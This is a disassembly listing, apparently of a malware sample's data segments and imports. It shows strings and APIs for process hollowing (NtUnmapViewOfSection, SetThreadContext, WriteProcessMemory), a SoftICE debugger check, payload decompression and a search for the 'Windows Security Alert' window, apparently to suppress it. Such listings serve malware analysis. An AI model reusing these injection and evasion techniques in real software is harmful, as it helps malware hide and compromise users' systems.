extrn __imp_RtlUnwind:dword ; DATA XREF: RtlUnwind�r
; LONG __stdcall InterlockedExchange(volatile LONG *Target, LONG Value)
extrn InterlockedExchange:dword ; CODE XREF: __ValidateEH3RN+131�p
; __ValidateEH3RN+196�p ...
; SIZE_T __stdcall VirtualQuery(LPCVOID lpAddress, PMEMORY_BASIC_INFORMATION lpBuffer, SIZE_T dwLength)
extrn VirtualQuery:dword ; CODE XREF: __ValidateEH3RN+B3�p
; __resetstkoflw+1A�p ...
; SIZE_T __stdcall HeapSize(HANDLE hHeap, DWORD dwFlags, LPCVOID lpMem)
extrn HeapSize:dword ; CODE XREF: __msize+30�p
; DATA XREF: __msize+30�r
; BOOL __stdcall QueryPerformanceCounter(LARGE_INTEGER *lpPerformanceCount)
extrn QueryPerformanceCounter:dword ; CODE XREF: ___security_init_cookie+43�p
; DATA XREF: ___security_init_cookie+43�r
; DWORD __stdcall GetTickCount()
extrn GetTickCount:dword ; CODE XREF: ___security_init_cookie+37�p
; DATA XREF: ___security_init_cookie+37�r
; DWORD __stdcall GetCurrentThreadId()
extrn GetCurrentThreadId:dword ; CODE XREF: ___security_init_cookie+2F�p
; DATA XREF: ___security_init_cookie+2F�r
; DWORD __stdcall GetCurrentProcessId()
extrn GetCurrentProcessId:dword ; CODE XREF: ___security_init_cookie+27�p
; DATA XREF: ___security_init_cookie+27�r
; void __stdcall GetSystemTimeAsFileTime(LPFILETIME lpSystemTimeAsFileTime)
extrn GetSystemTimeAsFileTime:dword ; CODE XREF: ___security_init_cookie+1B�p
; DATA XREF: ___security_init_cookie+1B�r
; int __stdcall LCMapStringA(LCID Locale, DWORD dwMapFlags, LPCSTR lpSrcStr, int cchSrc, LPSTR lpDestStr, int cchDest)
extrn LCMapStringA:dword ; CODE XREF: ___crtLCMapStringA+2C3�p
; ___crtLCMapStringA+344�p ...
; int __stdcall MultiByteToWideChar(UINT CodePage, DWORD dwFlags, LPCSTR lpMultiByteStr, int cbMultiByte, LPWSTR lpWideCharStr, int cchWideChar)
extrn MultiByteToWideChar:dword ; CODE XREF: ___crtLCMapStringA+C0�p
; ___crtLCMapStringA+141�p ...
; int __stdcall LCMapStringW(LCID Locale, DWORD dwMapFlags, LPCWSTR lpSrcStr, int cchSrc, LPWSTR lpDestStr, int cchDest)
extrn LCMapStringW:dword ; CODE XREF: ___crtLCMapStringA+27�p
; ___crtLCMapStringA+15B�p ...
; BOOL __stdcall GetStringTypeA(LCID Locale, DWORD dwInfoType, LPCSTR lpSrcStr, int cchSrc, LPWORD lpCharType)
extrn GetStringTypeA:dword ; CODE XREF: ___crtGetStringTypeA+19C�p
; DATA XREF: ___crtGetStringTypeA+19C�r
; BOOL __stdcall GetStringTypeW(DWORD dwInfoType, LPCWSTR lpSrcStr, int cchSrc, LPWORD lpCharType)
extrn GetStringTypeW:dword ; CODE XREF: ___crtGetStringTypeA+24�p
; ___crtGetStringTypeA+128�p
; DATA XREF: ...
; int __stdcall GetLocaleInfoA(LCID Locale, LCTYPE LCType, LPSTR lpLCData, int cchData)
extrn GetLocaleInfoA:dword ; CODE XREF: ___ansicp+20�p
; DATA XREF: ___ansicp+20�r
; BOOL __stdcall VirtualProtect(LPVOID lpAddress, SIZE_T dwSize, DWORD flNewProtect, PDWORD lpflOldProtect)
extrn VirtualProtect:dword ; CODE XREF: __resetstkoflw+D5�p
; DATA XREF: __resetstkoflw+D5�r
; void __stdcall GetSystemInfo(LPSYSTEM_INFO lpSystemInfo)
extrn GetSystemInfo:dword ; CODE XREF: __resetstkoflw+2B�p
; DATA XREF: __resetstkoflw+2B�r
; BOOL __stdcall TerminateProcess(HANDLE hProcess, UINT uExitCode)
extrn TerminateProcess:dword ; CODE XREF: _doexit+1A�p
; DATA XREF: _doexit+1A�r
; BOOL __stdcall FreeLibrary(HMODULE hLibModule)
extrn FreeLibrary:dword ; CODE XREF: sub_401000+78�p
; DATA XREF: sub_401000+78�r
;
; Imports from USER32.dll
;
; HWND __stdcall FindWindowA(LPCSTR lpClassName, LPCSTR lpWindowName)
extrn FindWindowA:dword ; CODE XREF: StartAddress+12�p
; StartAddress+23�p
; DATA XREF: ...
; int __stdcall MessageBoxA(HWND hWnd, LPCSTR lpText, LPCSTR lpCaption, UINT uType)
extrn MessageBoxA:dword ; CODE XREF: sub_401613+8E�p
; DATA XREF: sub_401613+8E�r
; LRESULT __stdcall SendMessageA(HWND hWnd, UINT Msg, WPARAM wParam, LPARAM lParam)
extrn SendMessageA:dword ; CODE XREF: StartAddress+35�p
; DATA XREF: StartAddress+35�r
; BOOL __stdcall IsWindow(HWND hWnd)
extrn IsWindow:dword ; CODE XREF: StartAddress+48�p
; DATA XREF: StartAddress+3B�r
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read
_rdata segment para public 'DATA' use32
assume cs:_rdata
;org 40611Ch
align 10h
; char aRtlgetcompress[]
aRtlgetcompress db 'RtlGetCompressionWorkSpaceSize',0 ; DATA XREF: sub_401000+3D�o
align 10h
; char ProcName[]
ProcName db 'RtlDecompressBuffer',0 ; DATA XREF: sub_401000+35�o
; char LibFileName[]
LibFileName db 'ntdll.dll',0 ; DATA XREF: sub_401000+1D�o
; sub_405892+5�o
align 10h
; char Text[]
Text db 'mnbbntrew t regfsdhfiasjdkfjasopdifisduifyhsdufyhasuidhfuiasdyfyu'
; DATA XREF: sub_401613+87�o
db ' sdyufsyudagfyu asgdf asdf asdg sfdg sfdgspdifisduifyhsdufyhasuid'
db 'hfuiasdyfyu sdyufsyudagfyu asgdf asdf asdg sfdg sfdgspdifisduifyh'
db 'sdufyhasuidhfuiasdyfyu sdyufsyudagfyu asgdf asdf asdg sfdg sfdgs',0
align 8
; char Caption[]
Caption db 'f78ret64375u435r q43tr67fstgdyfsew6r65fsdr65fasybfj5u435r q43tr67'
; DATA XREF: sub_401613+82�o
db 'fstgdyfsew6r65fsdr65fasybfj5u435r q43tr67fstgdyfsew6r65fsdr65fasy'
db 'bfjasgsfdhgfdjhgfd',0
align 10h
; char ModuleName[]
ModuleName db 'kernel32.dll',0 ; DATA XREF: sub_4016EE+DD�o
; WinMain(x,x,x,x)+81�o ...
align 10h
; char aWriteprocessme[]
aWriteprocessme db 'WriteProcessMemory',0 ; DATA XREF: sub_4016EE+D8�o
; WinMain(x,x,x,x)+11F�o
align 4
; char a689ytS78eyg67b[]
a689ytS78eyg67b db '689yt s78eyg67bsdf67tewa78ytijn4qhkte',0 ; DATA XREF: sub_401881+D3�o
align 4
; char a6897u546gfd78u[]
a6897u546gfd78u db '6897u546gfd78ui54wn8 gtrewyt rewy tre54',0 ; DATA XREF: sub_401881+B0�o
; char aCurrentuser[]
aCurrentuser db 'CurrentUser',0 ; DATA XREF: sub_40196F+47�o
; char String1[]
String1 db 'USER',0 ; DATA XREF: sub_40196F+38�o
align 4
; char FileName[]
FileName db '\\.\NTICE',0 ; DATA XREF: sub_4019CA+12�o
align 4
; char aKernel32_dll_0[]
aKernel32_dll_0 db 'KERNEL32.dll',0 ; DATA XREF: sub_4019FA+A�o
align 4
; char aCreateprocessa[]
aCreateprocessa db 'CreateProcessA',0 ; DATA XREF: sub_4019FA+5�o
align 4
; char WindowName[]
WindowName db 'Windows Security Alert',0 ; DATA XREF: StartAddress+A�o
align 4
; char aVirtualalloc[]
aVirtualalloc db 'VirtualAlloc',0 ; DATA XREF: WinMain(x,x,x,x)+7C�o
align 4
; char aReadprocessmem[]
aReadprocessmem db 'ReadProcessMemory',0 ; DATA XREF: sub_405858�o
align 10h
; char aSetthreadconte[]
aSetthreadconte db 'SetThreadContext',0 ; DATA XREF: sub_405875�o
align 4
; char aNtunmapviewofs[]
aNtunmapviewofs db 'NtUnmapViewOfSection',0 ; DATA XREF: sub_405892�o
align 10h
; const CHAR stru_406420
stru_406420 _msEH <0FFFFFFFFh, offset loc_4022E4, offset loc_4022F8>
; DATA XREF: start+2�o
; char aCorexitprocess[]
aCorexitprocess db 'CorExitProcess',0 ; DATA XREF: unknown_libname_1+F�o
align 4
; char aMscoree_dll[]
aMscoree_dll db 'mscoree.dll',0 ; DATA XREF: unknown_libname_1�o
aRuntimeError db 'runtime error ',0
align 4
db 0Dh,0Ah,0
align 4
aTlossError db 'TLOSS error',0Dh,0Ah,0
align 4
aSingError db 'SING error',0Dh,0Ah,0
align 4
aDomainError db 'DOMAIN error',0Dh,0Ah,0
align 10h
aR6029ThisAppli db 'R6029',0Dh,0Ah
db '- This application cannot run using the active version of the Mic'
db 'rosoft .NET Runtime',0Ah
db 'Please contact the application',27h,'s support team for more informa'
db 'tion.',0Dh,0Ah,0
align 4
aR6028UnableToI db 'R6028',0Dh,0Ah
db '- unable to initialize heap',0Dh,0Ah,0
align 4
aR6027NotEnough db 'R6027',0Dh,0Ah
db '- not enough space for lowio initialization',0Dh,0Ah,0
align 4
aR6026NotEnough db 'R6026',0Dh,0Ah
db '- not enough space for stdio initialization',0Dh,0Ah,0
align 4
aR6025PureVirtu db 'R6025',0Dh,0Ah
db '- pure virtual function call',0Dh,0Ah,0
align 4
aR6024NotEnough db 'R6024',0Dh,0Ah
db '- not enough space for _onexit/atexit table',0Dh,0Ah,0
align 4
aR6019UnableToO db 'R6019',0Dh,0Ah
db '- unable to open console device',0Dh,0Ah,0
align 4
aR6018Unexpecte db 'R6018',0Dh,0Ah
db '- unexpected heap error',0Dh,0Ah,0
align 4
aR6017Unexpecte db 'R6017',0Dh,0Ah
db '- unexpected multithread lock error',0Dh,0Ah,0
align 4
aR6016NotEnough db 'R6016',0Dh,0Ah
db '- not enough space for thread data',0Dh,0Ah,0
aThisApplicatio db 0Dh,0Ah
db 'This application has requested the Runtime to terminate it in an '
db 'unusual way.',0Ah
db 'Please contact the application',27h,'s support team for more informa'
db 'tion.',0Dh,0Ah,0
align 10h
aR6009NotEnough db 'R6009',0Dh,0Ah
db '- not enough space for environment',0Dh,0Ah,0
aR6008NotEnough db 'R6008',0Dh,0Ah
db '- not enough space for arguments',0Dh,0Ah,0
align 4
aR6002FloatingP db 'R6002',0Dh,0Ah ; DATA XREF: .data:off_408064�o
db '- floating point not loaded',0Dh,0Ah,0
align 10h
aMicrosoftVisua db 'Microsoft Visual C++ Runtime Library',0 ; DATA XREF: __NMSG_WRITE+123�o
; ___security_error_handler+132�o
align 4
; char asc_406818[]
asc_406818 db 0Ah ; DATA XREF: __NMSG_WRITE+107�o
; ___security_error_handler+FC�o
db 0Ah,0
align 4
; char aRuntimeErrorPr[]
aRuntimeErrorPr db 'Runtime Error!',0Ah ; DATA XREF: __NMSG_WRITE+F5�o
db 0Ah
db 'Program: ',0
align 4
; char a___[]
a___ db '...',0 ; DATA XREF: __NMSG_WRITE+C1�o
; ___security_error_handler+CC�o
; char aProgramNameUnk[]
aProgramNameUnk db '<program name unknown>',0 ; DATA XREF: __NMSG_WRITE+8E�o
; ___security_error_handler+8B�o
byte_406853 db 0 ; DATA XREF: __wincmdln+1B�o
align 8
stru_406858 _msEH <0FFFFFFFFh, offset loc_4039AF, offset loc_4039B3>
; DATA XREF: sub_403982+2�o
align 8
stru_406868 _msEH <0FFFFFFFFh, offset loc_4039F3, offset loc_4039F7>
; DATA XREF: sub_4039C6+2�o
; char aGetprocesswind[]
aGetprocesswind db 'GetProcessWindowStation',0 ; DATA XREF: ___crtMessageBoxA+73�o
; char aGetuserobjecti[]
aGetuserobjecti db 'GetUserObjectInformationA',0 ; DATA XREF: ___crtMessageBoxA+62�o
align 4
; char aGetlastactivep[]
aGetlastactivep db 'GetLastActivePopup',0 ; DATA XREF: ___crtMessageBoxA+47�o
align 4
; char aGetactivewindo[]
aGetactivewindo db 'GetActiveWindow',0 ; DATA XREF: ___crtMessageBoxA+3F�o
; char aMessageboxa[]
aMessageboxa db 'MessageBoxA',0 ; DATA XREF: ___crtMessageBoxA+2E�o
; char aUser32_dll[]
aUser32_dll db 'user32.dll',0 ; DATA XREF: ___crtMessageBoxA+13�o
align 8
stru_4068E8 _msEH <0FFFFFFFFh, offset sub_4042F1, offset sub_4042F5>
; DATA XREF: sub_404305-2F�o
; char aProgram[]
aProgram db 'Program: ',0 ; DATA XREF: ___security_error_handler+108�o
align 10h
aABufferOverrun db 'A buffer overrun has been detected which has corrupted the progra'
; DATA XREF: ___security_error_handler+62�o
db 'm',27h,'s',0Ah
db 'internal state. The program cannot safely continue execution and'
db ' must',0Ah
db 'now be terminated.',0Ah,0
aBufferOverrunD db 'Buffer overrun detected!',0
; DATA XREF: ___security_error_handler:loc_404CEC�o
align 10h
aASecurityError db 'A security error of unknown cause has been detected which has',0Ah
; DATA XREF: ___security_error_handler+4C�o
db 'corrupted the program',27h,'s internal state. The program cannot sa'
db 'fely',0Ah
db 'continue execution and must now be terminated.',0Ah,0
align 4
; char aUnknownSecurit[]
aUnknownSecurit db 'Unknown security failure detected!',0
; DATA XREF: ___security_error_handler+47�o
align 4
stru_406A98 _msEH <0FFFFFFFFh, offset loc_404CC7, offset loc_404CCB>
; DATA XREF: ___security_error_handler+5�o
dd 41h dup(0)
asc_406BA8: ; DATA XREF: .data:off_4082A0�o
unicode 0, < ((((( H>
dw 10h
dd 7 dup(100010h), 5 dup(840084h), 3 dup(100010h), 810010h
dd 2 dup(810081h), 10081h, 9 dup(10001h), 100001h, 2 dup(100010h)
dd 820010h, 2 dup(820082h), 20082h, 9 dup(20002h), 100002h
dd 100010h, 200010h, 40h dup(0)
dword_406DA8 dd 200000h, 4 dup(200020h), 280068h, 280028h, 200028h
; DATA XREF: .data:004082A4�o
dd 8 dup(200020h), 480020h, 7 dup(100010h), 840010h, 4 dup(840084h)
dd 100084h, 3 dup(100010h), 3 dup(1810181h), 0Ah dup(1010101h)
dd 3 dup(100010h), 3 dup(1820182h), 0Ah dup(1020102h)
dd 2 dup(100010h), 10h dup(200020h), 480020h, 8 dup(100010h)
dd 140010h, 100014h, 2 dup(100010h), 100014h, 2 dup(100010h)
dd 1010010h, 0Bh dup(1010101h), 1010010h, 3 dup(1010101h)
dd 0Ch dup(1020102h), 1020010h, 3 dup(1020102h), 1010102h
; const WCHAR SrcStr
SrcStr dw 0 ; DATA XREF: ___crtLCMapStringA+1C�o
; ___crtGetStringTypeA+1E�o
align 10h
stru_406FB0 _msEH <0FFFFFFFFh, offset loc_4050D0, offset loc_4050D4>
; DATA XREF: ___crtLCMapStringA+2�o
dd 0FFFFFFFFh, 404ECDh, 404ED1h, 0FFFFFFFFh, 404F9Bh, 404F9Fh
dd 0
stru_406FD8 _msEH <0FFFFFFFFh, offset loc_40526C, offset loc_405270>
; DATA XREF: ___crtGetStringTypeA+2�o
align 8
stru_406FE8 _msEH <0FFFFFFFFh, offset loc_405462, offset loc_405466>
; DATA XREF: ___convertcp+2�o
align 8
dd 48h, 0Eh dup(0)
dd offset dword_408190
dd offset dword_407040
dd 2
dword_407040 dd 3A60h, 4798h, 0dword_40704C dd 2 dup(0) ; sub_403982:loc_403995�o
dword_407054 dd 0 ; sub_4039C6:loc_4039D9�o
dd 70B0h, 2 dup(0)
dd 7620h, 6008h, 71B4h, 2 dup(0)
dd 7666h, 610Ch, 70A8h, 2 dup(0)
dd 7682h, 6000h, 5 dup(0)
dd 7672h, 0
dd 71E8h, 71F8h, 720Ah, 721Eh, 7230h, 7244h, 7258h, 726Ah
dd 727Ah, 7286h, 7294h, 72A2h, 72AEh, 72BCh, 72D0h, 72E4h
dd 72ECh, 7302h, 7312h, 7328h, 7334h, 7346h, 7358h, 7368h
dd 7376h, 7384h, 7392h, 739Eh, 73AEh, 73BCh, 71D6h, 73DEh
dd 73EAh, 73FAh, 7416h, 7430h, 7448h, 7462h, 7478h, 7488h
dd 74A2h, 74B4h, 74C2h, 74CCh, 74D8h, 74E4h, 74F0h, 7506h
dd 7516h, 7522h, 753Ch, 754Ch, 7562h, 7578h, 7592h, 75A2h
dd 75B8h, 75C8h, 75DAh, 75ECh, 75FEh, 7610h, 73CAh, 71C8h
dd 0
dd 7658h, 762Eh, 7648h, 763Ch, 0
db 0EFh ; ï
align 2
aFreelibrary db 'FreeLibrary',0
dw 198h
aGetprocaddress db 'GetProcAddress',0
align 4
db 48h ; H
db 2, 4Ch, 6Fh
aAdlibrarya db 'adLibraryA',0
align 4
db 7Ch ; |
db 3, 56h, 69h
aRtualqueryex db 'rtualQueryEx',0
align 2
dw 1CDh
aGetthreadconte db 'GetThreadContext',0
align 2
db '`',0
aCreateproces_0 db 'CreateProcessA',0
align 10h
db 77h ; w
db 1, 47h, 65h
aTmodulehandlea db 'tModuleHandleA',0
align 4
db 7Ah ; z
db 3, 56h, 69h
aRtualprotectex db 'rtualProtectEx',0
align 4
db 74h ; t
db 3, 56h, 69h
aRtualallocex db 'rtualAllocEx',0
align 2
dw 2C5h
aResumethread db 'ResumeThread',0
align 2
dw 2A9h
aReadfile db 'ReadFile',0
align 2
dw 15Bh
aGetfilesize db 'GetFileSize',0
aM db 'M',0
aCreatefilea db 'CreateFileA',0
dw 3B0h
aLstrcmpa db 'lstrcmpA',0
align 2
a_ db '.',0
aClosehandle db 'CloseHandle',0
db 0ACh ; ¬
db 2, 52h, 65h
aAdprocessmemor db 'adProcessMemory',0
db 3Ah ; :
db 1, 47h, 65h
aTcurrentproces db 'tCurrentProcess',0
db 47h ; G
db 3, 53h, 6Ch
db 65h ; e
db 65h, 70h, 0
db 0Ch
db 3, 53h, 65h
aTfileattribute db 'tFileAttributesA',0
align 2
aI db 'i',0
aCreatethread db 'CreateThread',0
align 2
dw 175h
aGetmodulefilen db 'GetModuleFileNameA',0
align 4
dd 65480206h, 6C417061h, 636F6Ch, 654701AFh, 61745374h
dd 70757472h, 6F666E49h, 1080041h, 43746547h, 616D6D6Fh
dd 694C646Eh, 41656Eh, 654701DFh, 72655674h, 6E6F6973h
dd 417845h, 6548020Ah, 65447061h, 6F727473h, 2080079h
dd 70616548h, 61657243h, 6574h, 69560376h, 61757472h, 6572466Ch
dd 20C0065h, 70616548h, 65657246h, 3730000h, 74726956h
dd 416C6175h, 636F6C6Ch, 2100000h, 70616548h, 6C416552h
dd 636F6Ch, 784500AFh, 72507469h, 7365636Fh, 34F0073h
dd 6D726554h, 74616E69h, 6F725065h, 73736563h, 3940000h
dd 74697257h, 6C694665h, 1B10065h, 53746547h, 61486474h
dd 656C646Eh, 3600000h
aUnhandledexcep db 'UnhandledExceptionFilter',0
align 2
aA db 'í',0
aFreeenvironmen db 'FreeEnvironmentStringsA',0
db 4Dh ; M
db 1, 47h, 65h
aTenvironmentst db 'tEnvironmentStrings',0
aU db 'î',0
aFreeenvironm_0 db 'FreeEnvironmentStringsW',0
dw 387h
aWidechartomult db 'WideCharToMultiByte',0
db 69h ; i
db 1, 47h, 65h
aTlasterror db 'tLastError',0
align 4
db 4Fh ; O
db 1, 47h, 65h
aTenvironment_0 db 'tEnvironmentStringsW',0
align 2
dw 317h
aSethandlecount db 'SetHandleCount',0
align 4
db 5Eh ; ^
db 1, 47h, 65h
aTfiletype db 'tFileType',0
dw 0F5h
aGetacp db 'GetACP',0
align 4
db 8Bh ; ‹
db 1, 47h, 65h
aToemcp db 'tOEMCP',0
align 4
db 0FCh ; ü
align 2
aGetcpinfo db 'GetCPInfo',0
db 0CAh ; Ê
db 2, 52h, 74h
aLunwind db 'lUnwind',0
db 1Fh
db 2, 49h, 6Eh
aTerlockedexcha db 'terlockedExchange',0
dw 37Bh
aVirtualquery db 'VirtualQuery',0
align 2
dw 212h
aHeapsize db 'HeapSize',0
align 2
dw 297h
aQueryperforman db 'QueryPerformanceCounter',0
db 0D5h ; Õ
db 1, 47h, 65h
aTtickcount db 'tTickCount',0
align 4
db 3Eh ; >
db 1, 47h, 65h
aTcurrentthread db 'tCurrentThreadId',0
align 2
dw 13Bh
aGetcurrentproc db 'GetCurrentProcessId',0
db 0C0h ; À
db 1, 47h, 65h
aTsystemtimeasf db 'tSystemTimeAsFileTime',0
dw 23Ah
aLcmapstringa db 'LCMapStringA',0
align 2
dw 26Bh
aMultibytetowid db 'MultiByteToWideChar',0
dd 434C023Bh, 5370614Dh, 6E697274h, 5767h, 654701B2h, 72745374h
dd 54676E69h, 41657079h, 1B50000h, 53746547h, 6E697274h
dd 70795467h, 5765h, 6547016Ch, 636F4C74h, 49656C61h, 416F666Eh
dd 3790000h, 74726956h, 506C6175h, 65746F72h, 7463h, 654701BBh
dd 73795374h, 496D6574h, 6F666Eh, 4E52454Bh, 32334C45h
dd 6C6C642Eh, 1DE0000h, 7373654Dh, 42656761h, 41786Fh
dd 734901ADh, 646E6957h, 776Fh, 6553023Bh, 654D646Eh, 67617373h
dd 4165h, 694600E3h, 6957646Eh, 776F646Eh, 53550041h, 32335245h
dd 6C6C642Eh, 1230000h, 55746547h, 4E726573h, 41656D61h
dd 44410000h, 49504156h, 642E3233h, 6C6Ch, 5Ch dup(0)
_rdata ends
; Section 3. (virtual address 00008000)
; Virtual size : 0002E87C ( 190588.)
; Section size in file : 00000400 ( 1024.)
; Offset to raw data for section: 00006600
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
_data segment para public 'DATA' use32
assume cs:_data
;org 408000h
dword_408000 dd 0 dd offset ___security_init_cookie
dd offset sub_405858
dd offset sub_405875
dd offset sub_405892
dword_408014 dd 0 dword_408018 dd 0 dd offset ___onexitinit
dd offset ___initmbctable
dword_408024 dd 0 dword_408028 dd 0 dword_40802C dd 0 dword_408030 dd 0 dword_408034 dd 3 dup(0) dword_408040 dd 6A00h ; sub_4011C8+A1�r ...
align 10h
off_408050 dd offset __exit ; DATA XREF: __amsg_exit+1C�r
dword_408054 dd 2 ; __FF_MSGBANNER+E�r
dd 10h, 0
dword_408060 dd 2 ; __NMSG_WRITE+3A�r
off_408064 dd offset aR6002FloatingP ; DATA XREF: __NMSG_WRITE+D5�r
; __NMSG_WRITE+112�r ...
; "R6002\r\n- floating point not loaded\r\n"
dd 8, 40679Ch, 9, 406770h, 0Ah, 4066D8h, 10h, 4066ACh
dd 11h, 40667Ch, 12h, 406658h, 13h, 40662Ch, 18h, 4065F4h
dd 19h, 4065CCh, 1Ah, 406594h, 1Bh, 40655Ch, 1Ch, 406534h
dd 1Dh, 406490h, 78h, 40647Ch, 79h, 40646Ch, 7Ah, 40645Ch
dd 0FCh, 406458h, 0FFh, 406448h
dword_4080F8 dd 0C0000005h, 0Bh, 0 dd 0C000001Dh, 4, 0
dd 0C0000096h, 4, 0
dd 0C000008Dh, 8, 0
dd 0C000008Eh, 8, 0
dd 0C000008Fh, 8, 0
dd 0C0000090h, 8, 0
dd 0C0000091h, 8, 0
dd 0C0000092h, 8, 0
dd 0C0000093h, 8, 0
dword_408170 dd 3 dword_408174 dd 7 dword_408178 dd 0Ah dword_40817C dd 8Ch ; __XcptFilter+BA�w ...
dd 0FFFFFFFFh, 0A80h, 2 dup(0)
dword_408190 dd 0BB40E64Eh ; sub_404305�r ...
align 8
byte_408198 db 1 ; DATA XREF: __setmbcp+120�r
db 2, 4, 8
align 10h
dword_4081A0 dd 3A4h dword_4081A4 dd 82798260h dd 21h, 0
dword_4081B0 dd 0DFA6h align 8
dd 0A5A1h, 0
dd 0FCE09F81h, 0
dd 0FC807E40h, 0
dd 3A8h, 0A3DAA3C1h, 20h, 5 dup(0)
dd 0FE81h, 0
dd 0FE40h, 0
dd 3B5h, 0A3DAA3C1h, 20h, 5 dup(0)
dd 0FE81h, 0
dd 0FE41h, 0
dd 3B6h, 0A2E4A2CFh, 0A2E5001Ah, 5BA2E8h, 4 dup(0)
dd 0FE81h, 0
dd 0FEA17E40h, 0
dd 551h, 0DA5EDA51h, 0DA5F0020h, 32DA6Ah, 4 dup(0)
dd 0DED8D381h, 0F9E0h, 0FE817E31h, 0
dword_408290 dd 19930520h, 3 dup(0) ; __NLG_Notify+2�o
off_4082A0 dd offset asc_406BA8 ; DATA XREF: _x_ismbbtype+18�r
; __ismbcspace:loc_405791�r ...
; " ((((( H"
dd offset dword_406DA8+2
dd 1, 0
dword_4082B0 dd 1 dd 2Eh, 1, 0
byte_4082C0 db 0 ; DATA XREF: sub_4011C8+49�w
; sub_401425+2E�w ...
align 4
dword_4082C4 dd 0 ; sub_4011C8+E�r ...
; HANDLE hFile
hFile dd 0 ; DATA XREF: sub_401881+23�w
; sub_401881+4C�r
byte_4082CC db 0 ; DATA XREF: sub_4011C8+1B�w
; sub_4011C8+43�w ...
align 10h
; HANDLE hThread
hThread dd 0 ; DATA XREF: sub_4016EE+150�w
; sub_401855�r
; struct _MEMORY_BASIC_INFORMATION Buffer
Buffer _MEMORY_BASIC_INFORMATION <0> ; DATA XREF: sub_4015FB+4�o
; sub_401613:loc_4016A7�r
dd 2 dup(0)
dword_4082F8 dd 0 byte_4082FC db 0 ; DATA XREF: sub_4011C8+2B�w
; sub_4011C8+34�w ...
align 10h
byte_408300 db 0 ; DATA XREF: sub_4011A3+17�w
; sub_4011C8+85�o ...
dword_408301 dd 0 ; sub_4011C8+C4�r ...
align 4
dd 4 dup(0)
byte_408318 db 0 ; DATA XREF: sub_4011C8+B5�w
align 4
dd 9 dup(0)
byte_408340 db 0 ; DATA XREF: sub_4011C8+62�w
align 4
dd 27h dup(0)
byte_4083E0 db 0 ; DATA XREF: sub_4011C8+113�w
align 4
dd 7 dup(0)
dd 0B7AAh dup(?)
dword_4362A8 dd ? ; int dword_4362AC
dword_4362AC dd ? ; sub_401881+7A�r ...
; int dword_4362B0
dword_4362B0 dd ? ; WinMain(x,x,x,x)+15E�r ...
dword_4362B4 dd ? ; WinMain(x,x,x,x)+196�r
byte_4362B8 db ? ; DATA XREF: sub_401855+6�w
; WinMain(x,x,x,x)+1A4�w
align 4
; DWORD nNumberOfBytesToRead
nNumberOfBytesToRead dd ? ; DATA XREF: sub_4011C8+25�r
; sub_401881+2E�w ...
dword_4362C0 dd ? ; sub_4016EE+74�w ...
dword_4362C4 dd ? ; resolved to->KERNEL32.ReadProcessMemory ; sub_405858+17�w
dword_4362C8 dd ? ; resolved to->NTDLL.ZwUnmapViewOfSection ; sub_405892+17�w
dword_4362CC dd ? ; resolved to->KERNEL32.SetThreadContext ; sub_405875+17�w
; char *Str
Str dd ? ; DATA XREF: start+11C�w
; __setenvp:loc_4033F2�r ...
align 8
dword_4362D8 dd ? dword_4362DC dd ? ; int dword_4362E0
dword_4362E0 dd ? ; _realloc:loc_404B98�r ...
align 10h
dword_4362F0 dd ? dword_4362F4 dd ? dword_4362F8 dd ? dword_4362FC dd ? ; ___heap_select+9�r ...
dword_436300 dd ? dword_436304 dd ? dword_436308 dd ? align 10h
; void *dword_436310
dword_436310 dd ? ; __setenvp:loc_403491�r ...
align 10h
dword_436320 dd ? align 8
byte_436328 db ? ; DATA XREF: _doexit+2D�w
align 4
dword_43632C dd ? dword_436330 dd ? dword_436334 dd ? dword_436338 dd ? ; __XcptFilter+73�w ...
align 10h
; char Filename[]
Filename db 104h dup(?) ; DATA XREF: __setargv+1C�o
byte_436444 db ? ; DATA XREF: __setargv+23�w
align 4
dword_436448 dd ? ; ___crtGetEnvironmentStringsA+24�w ...
dword_43644C dd ? ; ___crtMessageBoxA+38�w ...
dword_436450 dd ? ; ___crtMessageBoxA:loc_40406E�r
dword_436454 dd ? ; ___crtMessageBoxA+D6�r
dword_436458 dd ? ; ___crtMessageBoxA:loc_404029�r
dword_43645C dd ? ; ___crtMessageBoxA+9C�r
dword_436460 dd ? ; __setmbcp+21�w ...
align 8
dword_436468 dd ? ; __ValidateEH3RN+13F�r ...
align 10h
dword_436470 dd ? ; __ValidateEH3RN+1C4�r ...
dd 0Fh dup(?)
; volatile LONG Target
Target dd ? ; DATA XREF: __ValidateEH3RN+12C�o
; __ValidateEH3RN+191�o ...
dword_4364B4 dd ? align 10h
; LCID dword_4364C0
dword_4364C0 dd ? ; ___crtGetStringTypeA+14A�r ...
align 10h
; UINT dword_4364D0
dword_4364D0 dd ? ; ___crtLCMapStringA+9D�r ...
align 8
dword_4364D8 dd ? ; ___crtLCMapStringA+31�w ...
dword_4364DC dd ? ; ___crtGetStringTypeA+2E�w ...
; LCID Locale
Locale dd ? ; DATA XREF: _setSBCS+1A�w
; _setSBUpLow+84�r ...
dword_4364E4 dd ? ; __setmbcp+14D�w ...
dd 6 dup(?)
byte_436500 db ? ; DATA XREF: _setSBCS+6�o __setmbcp+A7�o ...
byte_436501 db ? ; DATA XREF: _parse_cmdline+47�r
; _parse_cmdline+11D�r ...
align 4
dd 40h dup(?)
; UINT CodePage
CodePage dd ? ; DATA XREF: _setSBCS+10�w
; _setSBUpLow+16�r ...
align 10h
dword_436610 dd 4 dup(?) ; __setmbcp+162�o ...
byte_436620 db ? ; DATA XREF: _setSBUpLow:loc_4044C1�w
; _setSBUpLow:loc_4044DE�w ...
align 4
dd 3Fh dup(?)
; UINT uNumber
uNumber dd ? ; DATA XREF: __ioinit+1F�w
; __ioinit:loc_403860�r ...
dd 7 dup(?)
dword_436740 dd ? ; __ioinit+3C�r ...
dword_436744 dd 3Fh dup(?) dword_436840 dd ? dword_436844 dd ? ; _doexit:loc_402FB3�r ...
; void *dword_436848
dword_436848 dd ? dword_43684C dd ? ; __setenvp+3�r ...
dword_436850 dd ? ; void *dword_436854
dword_436854 dd ? ; ___sbh_free_block+21C�r ...
dword_436858 dd ? ; ___sbh_find_block�r ...
; LPVOID lpMem
lpMem dd ? ; DATA XREF: ___sbh_heap_init+15�w
; ___sbh_find_block+8�r ...
dword_436860 dd ? ; ___sbh_heap_init+36�w ...
dword_436864 dd ? ; ___sbh_free_block+300�w ...
dword_436868 dd ? ; ___sbh_alloc_new_region+5�r ...
dword_43686C dd ? ; ___sbh_free_block+249�r ...
; HANDLE hHeap
hHeap dd ? ; DATA XREF: __heap_alloc+38�r
